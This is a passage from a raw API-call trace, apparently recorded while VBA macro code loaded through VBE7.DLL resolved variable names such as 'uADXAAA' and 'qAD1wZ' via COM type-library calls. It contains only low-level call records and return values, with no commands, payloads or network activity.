CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_PQkBkAD") returned 15 [0069.370] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.370] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_PQkBkAD", lHashVal=0x104593, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.370] IUnknown:Release (This=0x665ba50) returned 0xd [0069.370] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.371] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_PQkBkAD", lHashVal=0x104593, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.371] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.371] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.371] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_PQkBkAD", lHashVal=0x104593, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.371] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.371] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.371] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_PQkBkAD", lHashVal=0x104593, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.371] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.371] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.371] IUnknown:Release (This=0x665ba50) returned 0xd [0069.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1277e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_PQkBkAD") returned 15 [0069.371] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_PQkBkAD", lHashVal=0x104593, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0) returned 0x0 [0069.371] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80786 | out: _Dst=0x144ec0) returned 0x0 [0069.371] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uADXAAA", lHashVal=0x10e7b4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807ae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uADXAAA") returned 8 [0069.371] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uADXAAA", lHashVal=0x10e7b4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807ae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uADXAAA") returned 8 [0069.371] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uADXAAA", lHashVal=0x10e7b4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.371] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uADXAAA") returned 0x10e7b4 [0069.371] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="uADXAAA" | out: _Dst="uADXAAA") returned 0x0 [0069.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="uADXAAA") returned 8 [0069.372] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.372] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uADXAAA", lHashVal=0x10e7b4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.372] IUnknown:Release (This=0x665ba50) returned 0xd [0069.372] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.372] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uADXAAA", lHashVal=0x10e7b4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.372] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.372] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.372] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uADXAAA", lHashVal=0x10e7b4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.372] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.372] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.372] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uADXAAA", lHashVal=0x10e7b4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.372] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807ae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uADXAAA") returned 8 [0069.372] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uADXAAA", lHashVal=0x10e7b4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.372] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.372] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b807ae | out: _Dst=0x67c2d40) returned 0x0 [0069.372] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uADXAAA") returned 0x10dbb7 [0069.372] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_uADXAAA" | out: _Dst="_B_var_uADXAAA") returned 0x0 [0069.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_uADXAAA") returned 15 [0069.372] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.372] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uADXAAA", lHashVal=0x10dbb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.372] IUnknown:Release (This=0x665ba50) returned 0xd [0069.372] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.372] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uADXAAA", lHashVal=0x10dbb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.373] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.373] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.373] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uADXAAA", lHashVal=0x10dbb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.373] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.373] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.373] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uADXAAA", lHashVal=0x10dbb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.373] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.373] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.373] IUnknown:Release (This=0x665ba50) returned 0xd [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b127ae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_uADXAAA") returned 15 [0069.373] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uADXAAA", lHashVal=0x10dbb7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0069.373] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b807ae | out: _Dst=0x144ec0) returned 0x0 [0069.373] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qAD1wZ", lHashVal=0x10c03d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qAD1wZ") returned 7 [0069.373] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qAD1wZ", lHashVal=0x10c03d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qAD1wZ") returned 7 [0069.373] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qAD1wZ", lHashVal=0x10c03d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.373] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qAD1wZ") returned 0x10c03d [0069.373] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="qAD1wZ" | out: _Dst="qAD1wZ") returned 0x0 [0069.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="qAD1wZ") returned 7 [0069.374] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.374] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qAD1wZ", lHashVal=0x10c03d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.374] IUnknown:Release (This=0x665ba50) returned 0xd [0069.374] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.374] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qAD1wZ", lHashVal=0x10c03d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.374] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.374] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.374] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qAD1wZ", lHashVal=0x10c03d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.374] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.374] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.374] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qAD1wZ", lHashVal=0x10c03d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.374] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="qAD1wZ") returned 7 [0069.374] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qAD1wZ", lHashVal=0x10c03d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.374] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.374] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b807d6 | out: _Dst=0x67c2d40) returned 0x0 [0069.374] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qAD1wZ") returned 0x103aa7 [0069.374] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_qAD1wZ" | out: _Dst="_B_var_qAD1wZ") returned 0x0 [0069.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_qAD1wZ") returned 14 [0069.374] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.374] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qAD1wZ", lHashVal=0x103aa7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.374] IUnknown:Release (This=0x665ba50) returned 0xd [0069.374] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.374] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qAD1wZ", lHashVal=0x103aa7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.374] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.375] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.375] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qAD1wZ", lHashVal=0x103aa7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.375] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.375] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.375] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qAD1wZ", lHashVal=0x103aa7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.375] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.375] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.375] IUnknown:Release (This=0x665ba50) returned 0xd [0069.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b127de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_qAD1wZ") returned 14 [0069.375] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qAD1wZ", lHashVal=0x103aa7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77003100000000, pDummy=0x0) returned 0x0 [0069.375] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b807d6 | out: _Dst=0x144ec0) returned 0x0 [0069.375] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.375] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.375] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.375] IUnknown:Release (This=0x665ba50) returned 0xd [0069.375] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.375] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.375] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.375] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.375] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.375] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.375] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.375] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.389] IUnknown:Release (This=0x665ba50) returned 0xd [0069.389] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.390] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.390] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.390] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.390] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.390] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.390] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.390] IUnknown:Release (This=0x665ba50) returned 0xd [0069.390] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.390] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.390] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.390] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.390] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.390] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.390] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.390] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.390] IUnknown:Release (This=0x665ba50) returned 0xd [0069.390] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.391] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.391] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.391] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.391] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.391] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.391] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.391] IUnknown:Release (This=0x665ba50) returned 0xd [0069.391] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.391] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.391] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.391] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.391] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.391] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.391] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.391] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.392] IUnknown:Release (This=0x665ba50) returned 0xd [0069.392] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.392] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.392] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.392] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.392] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.392] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.392] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.392] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.392] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.392] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.392] IUnknown:Release (This=0x665ba50) returned 0xd [0069.392] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, 